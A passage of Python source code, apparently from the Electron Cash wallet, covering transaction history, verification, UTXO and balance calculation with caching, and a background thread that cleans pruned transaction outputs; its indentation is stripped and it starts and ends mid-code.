for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text=None, save=True):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
if save:
self.save_labels()
return changed
def save_labels(self):
self.storage.put('labels', self.labels)
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up siince is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
self._update_request_statuses_touched_by_tx(tx_hash)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
for tx_hash in txs:
self._update_request_statuses_touched_by_tx(tx_hash)
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_height(), except our
version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
assert isinstance(address, Address)
"effect of tx on address"
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# substract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status =_('Partially signed') + ' (%d/%d)'%(s,r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if (isInvoice):
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
self._update_request_statuses_touched_by_tx(tx_hash)
def _update_request_statuses_touched_by_tx(self, tx_hash):
tx = self.transactions.get(tx_hash)
if tx is None:
return
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _, addr, _ in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
